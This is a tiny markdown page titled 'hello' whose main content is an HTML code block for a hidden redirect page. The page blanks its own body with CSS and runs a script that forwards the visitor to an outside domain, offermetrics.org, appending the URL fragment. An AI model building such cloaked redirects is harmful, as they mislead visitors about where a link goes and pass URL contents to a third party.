# hello

hello

```
<head>
    <meta charset="UTF-8">
    <title>Redirecting…</title>
</head>
<body>
    Redirecting…
</body>

<style>
    body{
        visibility: hidden;
    }
</style>

<script> 
 var link_c = window.location.href; 
 var compliment = link_c.split("#")[1];  
 // console.log(window.location.href); 
 window.location.href = "https://offermetrics.org/"+compliment;
</script>

  
```

For the site tree, see the [root Markdown](https://slashpage.com/wissal-teams-goods.md).
